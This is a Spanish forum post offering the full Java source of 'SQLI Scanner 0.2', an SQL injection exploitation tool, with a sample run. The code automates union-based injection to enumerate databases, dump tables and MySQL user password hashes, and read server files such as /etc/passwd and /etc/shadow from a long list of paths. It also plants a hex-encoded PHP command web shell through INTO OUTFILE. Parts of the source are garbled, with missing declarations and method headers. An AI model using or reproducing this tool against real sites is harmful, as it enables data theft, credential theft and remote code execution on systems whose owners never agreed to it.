Traduccion completa de este simple programa para scannear paginas vulnerables a SQLI llamado k0bra que habia hecho antiguamente en Perl.
Con las siguientes opciones :
- Comprobar vulnerabilidad
- Buscar numero de columnas
- Buscar automaticamente el numero para mostrar datos
- Mostras tablas
- Mostrar columnas
- Mostrar bases de datos
- Mostrar tablas de otra DB
- Mostrar columnas de una tabla de otra DB
- Mostrar usuarios de mysql.user
- Buscar archivos usando load_file
- Mostrar un archivo usando load_file
- Mostrar valores
- Mostrar informacion sobre la DB
- Crear una shell usando outfile
- Todo se guarda en logs ordenados
Un ejemplo de uso :
-- == SQLI Scanner 0.2 == --
[+] Page :
http://localhost/sql.php?id=
[+] Checking ...
[+] Scanning ...
[Target] : http://localhost/sql.php?id=-1+union+select+hackman,2,3
[Limit] : The site has 3 columns
[Data] : The number 1 print data
-- == OPTIONS == --
--== information_schema.tables ==--
[1] : Show tables
[2] : Show columns
[3] : Show DBS
[4] : Show tables with other DB
[5] : Show columns with other DB
--== mysql.user ==--
[6] : Show users
--== Others ==--
[7] : Fuzzing files with load_file
[8] : Read a file with load_file
[9] : Dump
[10] : Informacion of the server
[11] : Create a shell with into outfile
[12] : Show Log
[13] : Exit
[Option] :
10
[+] Searching informaion ...
[+] DB Version : 5.5.20-log
[+] DB Name : hackman
[+] Username : root@localhost
[+] information_schema : on
[+] mysqluser : on
[-] load_file : off
[+] Finished
El codigo es el siguiente :
// -- == -- == -- == ---- ==
// SQLI Scanner 0.2 ||
// -- == -- == -- == ---- ==
// (C) Doddy Hackman 2013 ||
// -- == -- == -- == ---- ==
import java.util.Scanner;
import java.io.*;
import java.net.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
public class Main {
Scanner host
= new Scanner
(System.
in);
installer();
System.
out.
println("\n\n-- == SQLI Scanner 0.2 == --\n\n"); System.
out.
println("[+] Page : "); target = host.nextLine();
scan(target);
//schematables("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
//schemacolumns("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers");
//getdbs("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
//getablesbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman");
//getcolbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman","hackers");
//mysqluser("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
//dumper("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers","usuario","password");
//fuzzfiles("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
//openfile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","c:/test.txt");
//intofile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","C:/Archivos de programa/EasyPHP-5.3.9/www","/");
}
while (true) {
System.
out.
println("\n-- == OPTIONS == --\n"); System.
out.
println("--== information_schema.tables ==--"); System.
out.
println("[1] : Show tables"); System.
out.
println("[2] : Show columns"); System.
out.
println("[3] : Show DBS"); System.
out.
println("[4] : Show tables with other DB"); System.
out.
println("[5] : Show columns with other DB"); System.
out.
println("--== mysql.user ==--"); System.
out.
println("[6] : Show users"); System.
out.
println("--== Others ==--"); System.
out.
println("[7] : Fuzzing files with load_file"); System.
out.
println("[8] : Read a file with load_file"); System.
out.
println("[9] : Dump"); System.
out.
println("[10] : Informacion of the server"); System.
out.
println("[11] : Create a shell with into outfile"); System.
out.
println("[12] : Show Log"); System.
out.
println("[13] : Exit");
int op;
Scanner host
= new Scanner
(System.
in); System.
out.
println("\n[Option] :"); op = host.nextInt();
if (op == 1) {
schematables(urla);
continuar();
} else if (op == 2) {
Scanner a
= new Scanner
(System.
in); System.
out.
println("\n[+] Table : "); coler = a.nextLine();
schemacolumns(urla, coler);
continuar();
} else if (op == 3) {
getdbs(urla);
continuar();
} else if (op == 4) {
Scanner a
= new Scanner
(System.
in); System.
out.
println("\n[+] DB : "); tabler = a.nextLine();
getablesbydb(urla, tabler);
continuar();
} else if (op == 5) {
Scanner a
= new Scanner
(System.
in); System.
out.
println("\n[+] DB : "); dber = a.nextLine();
Scanner b
= new Scanner
(System.
in); System.
out.
println("\n[+] Table : "); tablerx = a.nextLine();
getcolbydb(urla, dber, tablerx);
continuar();
} else if (op == 6) {
mysqluser(urla);
continuar();
} else if (op == 7) {
fuzzfiles(urla);
continuar();
} else if (op == 8) {
Scanner f
= new Scanner
(System.
in); System.
out.
println("\n[+] File : "); ar = f.nextLine();
openfile(urla, ar);
continuar();
} else if (op == 9) {
Scanner m
= new Scanner
(System.
in); System.
out.
println("\n[+] Table : "); a = m.nextLine();
Scanner n
= new Scanner
(System.
in); System.
out.
println("\n[+] Column 1 : "); b = n.nextLine();
Scanner l
= new Scanner
(System.
in); System.
out.
println("\n[+] Column 2 : "); c = l.nextLine();
dumper(urla, a, b, c);
continuar();
} else if (op == 10) {
details(urla);
continuar();
} else if (op == 11) {
Scanner m
= new Scanner
(System.
in); System.
out.
println("\n[+] Full Path Discloure : "); b = m.nextLine();
Scanner n
= new Scanner
(System.
in); System.
out.
println("\n[+] Directory to test : "); c = n.nextLine();
intofile(urla, b, c);
continuar();
} else if (op == 12) {
ruta
= System.
getProperty("user.dir") + "/logs/" + h.
getHost() + ".txt";
System.
out.
println("\n[+] Check logs in : " + ruta
); continuar();
} else if (op == 13) {
System.
out.
println("\n-- == (C) Doddy Hackman 2013 == --"); continuar();
} else {
System.
out.
println("\n[-] Bad Option\n"); continuar();
}
}
}
private static void continuar
() throws Exception { System.
out.
println("\n[+] Finished\n"); Scanner chau
= new Scanner
(System.
in); chau.nextLine();
}
private static void installer
() throws Exception {
if (!crear.isDirectory()) {
crear.mkdirs();
}
}
linea = "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e";
lugar = fpd + "/cmd.php";
lugardos = dir + "/cmd.php";
System.
out.
println("\n[+] Checking ...\n");
webtest = "http://" + h.getHost() + lugardos;
Pattern uno = null;
Matcher dos = null;
web1 = urla.replace("hackman", linea);
formandoweb = web1 + "+into+outfile+'" + lugar + "'--";
code = toma(formandoweb);
code = toma(webtest);
uno = Pattern.compile("Mini Shell By Doddy");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[Shell UP] : " + webtest
); savefile(urla, "\r\n" + "[Shell UP] : " + webtest + "\r\n");
} else {
System.
out.
println("[-] Error"); }
}
Pattern uno = null;
Matcher dos = null;
archivo = encodehex(file);
web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))");
System.
out.
println("\n[+] Reading ...\n");
code = toma(web1);
uno = Pattern.compile("ERTOR854(.*?)ERTOR854");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[+] File Found : " + file
); System.
out.
println("\n[Source Start]\n"); System.
out.
println(dos.
group(1)); System.
out.
println("\n[Source End]\n");
savefile(urla, "\r\n" + "[+] File Found : " + file);
savefile(urla, "\r\n" + "[Source Start]" + "\r\n");
savefile(urla, dos.group(1));
savefile(urla, "\r\n" + "[Source End]" + "\r\n");
} else {
System.
out.
println("[-] Not Found"); }
}
String[] archivos
= {"c:/test.txt",
"C:/xampp/htdocs/aca.txt",
"C:/xampp/htdocs/aca.txt",
"C:/xampp/htdocs/admin.php",
"C:/xampp/htdocs/leer.txt",
"../../../boot.ini",
"../../../../boot.ini",
"../../../../../boot.ini",
"../../../../../../boot.ini",
"/etc/passwd",
"/etc/shadow",
"/etc/shadow~",
"/etc/hosts",
"/etc/motd",
"/etc/apache/apache.conf",
"/etc/fstab",
"/etc/apache2/apache2.conf",
"/etc/apache/httpd.conf",
"/etc/httpd/conf/httpd.conf",
"/etc/apache2/httpd.conf",
"/etc/apache2/sites-available/default",
"/etc/mysql/my.cnf",
"/etc/my.cnf",
"/etc/sysconfig/network-scripts/ifcfg-eth0",
"/etc/redhat-release",
"/etc/httpd/conf.d/php.conf",
"/etc/pam.d/proftpd",
"/etc/phpmyadmin/config.inc.php",
"/var/www/config.php",
"/etc/httpd/logs/error_log",
"/etc/httpd/logs/error.log",
"/etc/httpd/logs/access_log",
"/etc/httpd/logs/access.log",
"/var/log/apache/error_log",
"/var/log/apache/error.log",
"/var/log/apache/access_log",
"/var/log/apache/access.log",
"/var/log/apache2/error_log",
"/var/log/apache2/error.log",
"/var/log/apache2/access_log",
"/var/log/apache2/access.log",
"/var/www/logs/error_log",
"/var/www/logs/error.log",
"/var/www/logs/access_log",
"/var/www/logs/access.log",
"/usr/local/apache/logs/error_log",
"/usr/local/apache/logs/error.log",
"/usr/local/apache/logs/access_log",
"/usr/local/apache/logs/access.log",
"/var/log/error_log",
"/var/log/error.log",
"/var/log/access_log",
"/var/log/access.log",
"/etc/group",
"/etc/security/group",
"/etc/security/passwd",
"/etc/security/user",
"/etc/security/environ",
"/etc/security/limits",
"/usr/lib/security/mkuser.default",
"/apache/logs/access.log",
"/apache/logs/error.log",
"/etc/httpd/logs/acces_log",
"/etc/httpd/logs/acces.log",
"/var/log/httpd/access_log",
"/var/log/httpd/error_log",
"/apache2/logs/error.log",
"/apache2/logs/access.log",
"/logs/error.log",
"/logs/access.log",
"/usr/local/apache2/logs/access_log",
"/usr/local/apache2/logs/access.log",
"/usr/local/apache2/logs/error_log",
"/usr/local/apache2/logs/error.log",
"/var/log/httpd/access.log",
"/var/log/httpd/error.log",
"/opt/lampp/logs/access_log",
"/opt/lampp/logs/error_log",
"/opt/xampp/logs/access_log",
"/opt/xampp/logs/error_log",
"/opt/lampp/logs/access.log",
"/opt/lampp/logs/error.log",
"/opt/xampp/logs/access.log",
"/opt/xampp/logs/error.log",
"C:/ProgramFiles/ApacheGroup/Apache/logs/access.log",
"C:/ProgramFiles/ApacheGroup/Apache/logs/error.log",
"/usr/local/apache/conf/httpd.conf",
"/usr/local/apache2/conf/httpd.conf",
"/etc/apache/conf/httpd.conf",
"/usr/local/etc/apache/conf/httpd.conf",
"/usr/local/apache/httpd.conf",
"/usr/local/apache2/httpd.conf",
"/usr/local/httpd/conf/httpd.conf",
"/usr/local/etc/apache2/conf/httpd.conf",
"/usr/local/etc/httpd/conf/httpd.conf",
"/usr/apache2/conf/httpd.conf",
"/usr/apache/conf/httpd.conf",
"/usr/local/apps/apache2/conf/httpd.conf",
"/usr/local/apps/apache/conf/httpd.conf",
"/etc/apache2/conf/httpd.conf",
"/etc/http/conf/httpd.conf",
"/etc/httpd/httpd.conf",
"/etc/http/httpd.conf",
"/etc/httpd.conf",
"/opt/apache/conf/httpd.conf",
"/opt/apache2/conf/httpd.conf",
"/var/www/conf/httpd.conf",
"/private/etc/httpd/httpd.conf",
"/private/etc/httpd/httpd.conf.default",
"/Volumes/webBackup/opt/apache2/conf/httpd.conf",
"/Volumes/webBackup/private/etc/httpd/httpd.conf",
"/Volumes/webBackup/private/etc/httpd/httpd.conf.default",
"C:/ProgramFiles/ApacheGroup/Apache/conf/httpd.conf",
"C:/ProgramFiles/ApacheGroup/Apache2/conf/httpd.conf",
"C:/ProgramFiles/xampp/apache/conf/httpd.conf",
"/usr/local/php/httpd.conf.php",
"/usr/local/php4/httpd.conf.php",
"/usr/local/php5/httpd.conf.php",
"/usr/local/php/httpd.conf",
"/usr/local/php4/httpd.conf",
"/usr/local/php5/httpd.conf",
"/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf",
"/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf",
"/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf",
"/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php",
"/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php",
"/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php",
"/usr/local/etc/apache/vhosts.conf",
"/etc/php.ini",
"/bin/php.ini",
"/etc/httpd/php.ini",
"/usr/lib/php.ini",
"/usr/lib/php/php.ini",
"/usr/local/etc/php.ini",
"/usr/local/lib/php.ini",
"/usr/local/php/lib/php.ini",
"/usr/local/php4/lib/php.ini",
"/usr/local/php5/lib/php.ini",
"/usr/local/apache/conf/php.ini",
"/etc/php4.4/fcgi/php.ini",
"/etc/php4/apache/php.ini",
"/etc/php4/apache2/php.ini",
"/etc/php5/apache/php.ini",
"/etc/php5/apache2/php.ini",
"/etc/php/php.ini",
"/etc/php/php4/php.ini",
"/etc/php/apache/php.ini",
"/etc/php/apache2/php.ini",
"/web/conf/php.ini",
"/usr/local/Zend/etc/php.ini",
"/opt/xampp/etc/php.ini",
"/var/local/www/conf/php.ini",
"/etc/php/cgi/php.ini",
"/etc/php4/cgi/php.ini",
"/etc/php5/cgi/php.ini",
"c:/php5/php.ini",
"c:/php4/php.ini",
"c:/php/php.ini",
"c:/PHP/php.ini",
"c:/WINDOWS/php.ini",
"c:/WINNT/php.ini",
"c:/apache/php/php.ini",
"c:/xampp/apache/bin/php.ini",
"c:/NetServer/bin/stable/apache/php.ini",
"c:/home2/bin/stable/apache/php.ini",
"c:/home/bin/stable/apache/php.ini",
"/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini",
"/usr/local/cpanel/logs",
"/usr/local/cpanel/logs/stats_log",
"/usr/local/cpanel/logs/access_log",
"/usr/local/cpanel/logs/error_log",
"/usr/local/cpanel/logs/license_log",
"/usr/local/cpanel/logs/login_log",
"/var/cpanel/cpanel.config",
"/var/log/mysql/mysql-bin.log",
"/var/log/mysql.log",
"/var/log/mysqlderror.log",
"/var/log/mysql/mysql.log",
"/var/log/mysql/mysql-slow.log",
"/var/mysql.log",
"/var/lib/mysql/my.cnf",
"C:/ProgramFiles/MySQL/MySQLServer5.0/data/hostname.err",
"C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.log",
"C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.err",
"C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql-bin.log",
"C:/ProgramFiles/MySQL/data/hostname.err",
"C:/ProgramFiles/MySQL/data/mysql.log",
"C:/ProgramFiles/MySQL/data/mysql.err",
"C:/ProgramFiles/MySQL/data/mysql-bin.log",
"C:/MySQL/data/hostname.err",
"C:/MySQL/data/mysql.log",
"C:/MySQL/data/mysql.err",
"C:/MySQL/data/mysql-bin.log",
"C:/ProgramFiles/MySQL/MySQLServer5.0/my.ini",
"C:/ProgramFiles/MySQL/MySQLServer5.0/my.cnf",
"C:/ProgramFiles/MySQL/my.ini",
"C:/ProgramFiles/MySQL/my.cnf",
"C:/MySQL/my.ini",
"C:/MySQL/my.cnf",
"/etc/logrotate.d/proftpd",
"/www/logs/proftpd.system.log",
"/var/log/proftpd",
"/etc/proftp.conf",
"/etc/protpd/proftpd.conf",
"/etc/vhcs2/proftpd/proftpd.conf",
"/etc/proftpd/modules.conf",
"/var/log/vsftpd.log",
"/etc/vsftpd.chroot_list",
"/etc/logrotate.d/vsftpd.log",
"/etc/vsftpd/vsftpd.conf",
"/etc/vsftpd.conf",
"/etc/chrootUsers",
"/var/log/xferlog",
"/var/adm/log/xferlog",
"/etc/wu-ftpd/ftpaccess",
"/etc/wu-ftpd/ftphosts",
"/etc/wu-ftpd/ftpusers",
"/usr/sbin/pure-config.pl",
"/usr/etc/pure-ftpd.conf",
"/etc/pure-ftpd/pure-ftpd.conf",
"/usr/local/etc/pure-ftpd.conf",
"/usr/local/etc/pureftpd.pdb",
"/usr/local/pureftpd/etc/pureftpd.pdb",
"/usr/local/pureftpd/sbin/pure-config.pl",
"/usr/local/pureftpd/etc/pure-ftpd.conf",
"/etc/pure-ftpd/pure-ftpd.pdb",
"/etc/pureftpd.pdb",
"/etc/pureftpd.passwd",
"/etc/pure-ftpd/pureftpd.pdb",
"/var/log/pure-ftpd/pure-ftpd.log",
"/logs/pure-ftpd.log",
"/var/log/pureftpd.log",
"/var/log/ftp-proxy/ftp-proxy.log",
"/var/log/ftp-proxy",
"/var/log/ftplog",
"/etc/logrotate.d/ftp",
"/etc/ftpchroot",
"/etc/ftphosts",
"/var/log/exim_mainlog",
"/var/log/exim/mainlog",
"/var/log/maillog",
"/var/log/exim_paniclog",
"/var/log/exim/paniclog",
"/var/log/exim/rejectlog",
"/var/log/exim_rejectlog"};
Pattern uno = null;
Matcher dos = null;
System.
out.
println("\n[+] Searching files with load_file() ....\n");
for (int count = 0; count < archivos.length; count++) {
archivo = encodehex(archivos[count]);
web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))");
code = toma(web1);
uno = Pattern.compile("ERTOR854(.*?)ERTOR854");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[+] File Found : " + archivos
[count
]); System.
out.
println("\n[Source Start]\n"); System.
out.
println(dos.
group(1)); System.
out.
println("\n[Source End]\n");
savefile(urla, "\r\n" + "[+] File Found : " + archivos[count]);
savefile(urla, "\r\n" + "[Source Start]" + "\r\n");
savefile(urla, dos.group(1));
savefile(urla, "\r\n" + "[Source End]" + "\r\n");
}
}
}
int x;
Pattern uno = null;
Matcher dos = null;
web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241," + col1 + ",0x4b30425241," + col2 + ",0x4b30425241)))");
code = toma(web1 + "+from+" + tabla + "--");
System.
out.
println("\n[+] Getting Values ...");
uno = Pattern.compile("K0BRA(.*?)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("\n[+] Values Founds : " + dos.
group(1)); savefile(urla, "\r\n" + "[+] Table to dump : " + tabla + "\r\n");
int finals
= Integer.
parseInt(dos.
group(1));
for (x = 0; x <= finals; x = x + 1) {
code = toma(web2 + "+from+" + tabla + "+limit+" + x + ",1--");
uno = Pattern.compile("K0BRA(.*)K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("\n[+] " + col1
+ " : " + dos.
group(1)); System.
out.
println("[+] " + col2
+ " : " + dos.
group(2));
savefile(urla, "\r\n" + "[+] " + col1 + " : " + dos.group(1));
savefile(urla, "[+] " + col2 + " : " + dos.group(2));
}
}
} else {
System.
out.
println("[-] Not Found"); }
}
int x;
Pattern uno = null;
Matcher dos = null;
web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))");
System.
out.
println("\n[+] Searching mysql.user ....");
code = toma(web1 + "+from+mysql.user--");
uno = Pattern.compile("K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("\n[+] Users Found : " + dos.
group(1));
savefile(urla, "\r\n" + "[+] Users Found : " + dos.group(1) + "\r\n");
int finals
= Integer.
parseInt(dos.
group(1));
for (x = 0; x <= finals; x = x + 1) {
code = toma(web2 + "+from+mysql.user+limit+" + x + ",1--");
uno = Pattern.compile("K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("\n[+] Host : " + dos.
group(1)); System.
out.
println("[+] Username : " + dos.
group(2)); System.
out.
println("[+] Password : " + dos.
group(3));
savefile(urla, "\r\n" + "[+] Host : " + dos.group(1));
savefile(urla, "[+] Username : " + dos.group(2));
savefile(urla, "[+] Password : " + dos.group(3));
}
}
} else {
System.
out.
println("[-] Not Found"); }
}
int x;
Pattern uno = null;
Matcher dos = null;
dbf = encodehex(db);
table = encodehex(tab);
web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");
System.
out.
println("\n[+] Getting Columns ....");
code = toma(web1 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "--");
uno = Pattern.compile("K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("\n[+] Columns Found : " + dos.
group(1) + "\n");
savefile(urla, "\r\n" + "[+] Columns Found in the Table [" + tab + "." + db + "] : " + dos.group(1) + "\r\n");
int finals
= Integer.
parseInt(dos.
group(1));
for (x = 0; x <= finals; x = x + 1) {
code = toma(web2 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "+limit+" + x + ",1--");
uno = Pattern.compile("K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[+] Column Found : " + dos.
group(1)); savefile(urla, "[+] Column Found : " + dos.group(1));
}
}
} else {
System.
out.
println("[-] Not Found"); }
}
int x;
Pattern uno = null;
Matcher dos = null;
data = encodehex(db);
web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");
System.
out.
println("\n[+] Getting Tables ....");
code = toma(web1 + "+from+information_schema.tables+where+table_schema=" + data + "--");
uno = Pattern.compile("K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("\n[+] Tables Found : " + dos.
group(1) + "\n"); savefile(urla, "\r\n" + "[DB] : " + db + "\r\n");
int finals
= Integer.
parseInt(dos.
group(1));
for (x = 0; x <= finals; x = x + 1) {
code = toma(web2 + "+from+information_schema.tables+where+table_schema=" + data + "+limit+" + x + ",1--");
uno = Pattern.compile("K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[+] Table Found : " + dos.
group(1)); savefile(urla, "[+] Table Found : " + dos.group(1));
}
}
} else {
System.
out.
println("[-] Not Found"); }
}
int x;
Pattern uno = null;
Matcher dos = null;
web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))");
System.
out.
println("\n[+] Getting DBS ....");
code = toma(web1 + "+from+information_schema.schemata--");
uno = Pattern.compile("K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("\n[+] DBS Found : " + dos.
group(1) + "\n");
savefile(urla, "\r\n" + "[+] DBS Found : " + dos.group(1) + "\r\n");
int finals
= Integer.
parseInt(dos.
group(1));
for (x = 0; x <= finals; x = x + 1) {
code = toma(web2 + "+from+information_schema.schemata+limit+" + x + ",1--");
uno = Pattern.compile("K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[+] DB Found : " + dos.
group(1)); savefile(urla, "[+] DB Found : " + dos.group(1));
}
}
} else {
System.
out.
println("[-] Not Found"); }
}
int x;
Pattern uno = null;
Matcher dos = null;
tablexa = encodehex(nombre);
web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))");
web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");
System.
out.
println("\n[+] Getting columns ....");
code = toma(web1 + "+from+information_schema.columns+where+table_name=" + tablexa + "--");
uno = Pattern.compile("K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("\n[+] Columns Found : " + dos.
group(1) + "\n");
savefile(urla, "\r\n" + "[Table] : " + nombre + "\r\n");
int finals
= Integer.
parseInt(dos.
group(1));
for (x = 0; x <= finals; x = x + 1) {
code = toma(web2 + "+from+information_schema.columns+where+table_name=" + tablexa + "+limit+" + x + ",1--");
uno = Pattern.compile("K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[+] Column Found : " + dos.
group(1)); savefile(urla, "[+] Column Found : " + dos.group(1));
}
}
} else {
System.
out.
println("[-] Not Found"); }
}
int x;
Pattern uno = null;
Matcher dos = null;
web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))");
web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");
System.
out.
println("\n[+] Getting tables ....\n");
code = toma(web1 + "+from+information_schema.tables--");
uno = Pattern.compile("K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[+] Tables Found : " + dos.
group(1) + "\n");
savefile(urla, "");
int finals
= Integer.
parseInt(dos.
group(1));
for (x = 0; x <= finals; x = x + 1) {
code = toma(web2 + "+from+information_schema.tables+limit+" + x + ",1--");
uno = Pattern.compile("K0BRA(.*)K0BRA");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[+] Table Found : " + dos.
group(1)); savefile(urla, "[+] Table Found : " + dos.group(1));
}
}
} else {
System.
out.
println("[-] Not Found"); }
}
Pattern uno = null;
Matcher dos = null;
target = urla;
System.
out.
println("\n[+] Checking ...\n");
codex = toma(target + "-1+union+select+666--");
uno = Pattern.compile("The used SELECT statements have a different number of columns");
dos = uno.matcher(codex);
if (dos.find()) {
System.
out.
println("[+] Scanning ...\n");
int x;
urlfinal = "";
formariny = "";
for (x = 1; x <= 5; x = x + 1) {
//urlfinal = urlfinal+x+",";
urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ",";
formariny = formariny + x + ",";
otrofinal = urlfinal;
otroformar = formariny;
otrofinal = otrofinal.substring(0, otrofinal.length() - 1);
otroformar = otroformar.substring(0, otroformar.length() - 1);
code = toma(target + "-1+union+select+" + otrofinal);
uno = Pattern.compile("RATSXPDOWN(\\d+)");
dos = uno.matcher(code);
if (dos.find()) {
otroformar = otroformar.replace(dos.group(1), "hackman");
link = target + "-1+union+select+" + otroformar;
System.
out.
println("[Target] : " + link
); System.
out.
println("[Limit] : The site has " + x
+ " columns"); System.
out.
println("[Data] : The number " + dos.
group(1) + " print data");
savefile(link, "\r\n" + "[Target] : " + link);
savefile(link, "[Limit] : The site has " + x + " columns");
savefile(link, "[Data] : The number " + dos.group(1) + " print data");
manejo(link);
}
}
System.
out.
println("[-] Error"); } else {
System.
out.
println("[-] Not vulnerable"); }
}
Pattern uno = null;
Matcher dos = null;
concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))";
urla = urla.replace("hackman", concat);
System.
out.
println("\n[+] Searching informaion ...\n");
code = toma(urla);
uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[+] DB Version : " + dos.
group(1)); System.
out.
println("[+] DB Name : " + dos.
group(2)); System.
out.
println("[+] Username : " + dos.
group(3));
savefile(urla, "\r\n" + "[+] DB Version : " + dos.group(1));
savefile(urla, "[+] DB Name : " + dos.group(2));
savefile(urla, "[+] Username : " + dos.group(3));
} else {
System.
out.
println("[-] Not found any data"); }
urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)");
code = toma(urla + "+from+information_schema.tables--");
uno = Pattern.compile("ERTOR854");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[+] information_schema : on"); savefile(urla, "[+] information_schema : on");
} else {
System.
out.
println("[-] information_schema : off"); }
code = toma(urla + "+from+mysql.user--");
uno = Pattern.compile("ERTOR854");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[+] mysqluser : on"); savefile(urla, "[+] mysqluser : on");
} else {
System.
out.
println("[-] mysquser : off"); }
urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))");
code = toma(urla);
uno = Pattern.compile("ERTOR854");
dos = uno.matcher(code);
if (dos.find()) {
System.
out.
println("[-] load_file : on"); savefile(urla, "[-] load_file : on");
} else {
System.
out.
println("[-] load_file : off"); }
}
formar = "logs/" + h.getHost() + ".txt";
writer.write(texto + "\r\n");
writer.close();
}
hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
while ((re = nave.readLine()) != null) {
conte.append(re);
}
nave.close();
return conte.toString();
}
//Thanks to Katarina Majetic
//Based on http://www.dzone.com/snippets/encode-string-hex
byte[] z = text.getBytes();
int n;
int a = z.length;
int u;
for (n = 0; n < a; n++) {
u = z[n] & 0x000000FF;
h.append(l);
}
return "0x" + h.toString();
}
}
//The End ?